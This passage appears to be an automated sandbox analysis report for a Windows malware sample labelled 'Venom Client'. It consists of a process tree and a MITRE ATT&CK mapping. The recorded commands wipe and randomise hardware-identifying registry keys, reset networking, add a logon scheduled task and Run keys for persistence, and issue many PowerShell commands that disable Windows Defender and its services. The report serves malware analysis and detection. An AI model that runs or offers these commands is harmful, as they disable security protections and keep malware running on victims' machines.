      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      Modifies registry key
      PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:3852
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Modifies registry key
      PID:5984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
    3⤵
    PID:1768
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:64
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      Modifies registry key
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
    3⤵
    PID:4612
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
      4⤵
      Modifies registry key
      PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:5872
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      Modifies registry key
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
    3⤵
    PID:5124
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
      4⤵
      Modifies registry key
      PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:224
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 250965864295315637242152721732335176661237465922413317818 /f
      4⤵
      Modifies registry key
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5868
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2509658642953156372421527217323351766612374659224133 /f
      4⤵
      Modifies registry key
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 25096586429531563724215272173233517666123746592 /f
      4⤵
      Modifies registry key
      PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 250965864295315637242152721732335176661237465922413317818 /f
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4484
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 250965864295315637242152721732335176661237465922413317818 /f
      4⤵
      Modifies registry key
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4844
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2509658642953156372421527217323351766612374 /f
      4⤵
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2509658642953 /f
      4⤵
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:4668
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2509658642953 /f
      4⤵
      Modifies registry key
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5208
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2509658642953 /f
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5552
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 2509658642953 /f
      4⤵
      Modifies registry key
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4388
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 250965864295315637242152721732335176661237465922413317818 /f
      4⤵
      PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f
    3⤵
    PID:4828
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.25096.5864-2953_1563724215 /f
      4⤵
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:620
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {25096-5864-2953-15637} /f
      4⤵
      Modifies registry key
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
    3⤵
    PID:404
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
      4⤵
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
    3⤵
    PID:3688
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
      4⤵
      PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
    3⤵
    PID:4924
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
      4⤵
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:3516
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:5920
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:6084
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:1592
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:5848
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c arp -d
    3⤵
    PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache
    3⤵
    PID:720
  - - C:\Windows\system32\netsh.exe
      netsh interface ip delete arpcache
      4⤵
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe
    3⤵
    PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe
    3⤵
    PID:4408
- C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
  "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4740
- - C:\Windows\SysWOW64\Images.exe
    "C:\Windows\SysWOW64\Images.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4892
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3220
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:4220
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"
      4⤵
      Adds Run key to start application
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      PID:2176
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2716
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5308
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3948
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:392
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:940
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:5784
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:2036
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:552
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:2132
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:2284
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:4840
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:4504
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:4312
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:1768
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:5872
    - - C:\Windows\SysWOW64\Images.exe
        
        "C:\Windows\SysWOW64\Images.exe"
        5⤵
        
        PID:3108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      4⤵
      PID:5820
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2008
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:3972
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:100
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:4052
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5024
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:3560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:4204
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1576
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:3516
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:5100
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:3112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:4988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3652
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2416
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3948
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2880
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3500
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1896
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5248
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      4⤵
      PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ｱムゐﾌﾚの√尺ひゐｷ丂ﾌのｱ乃.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5648
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -\Common 10 localhost
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
      "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3276
- C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe
  "C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5836

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:432
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  2⤵
  - Adds Run key to start application
  PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe
1⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe
1⤵
PID:5328

C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\SysWOW64\Images.exe
1⤵
PID:2500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery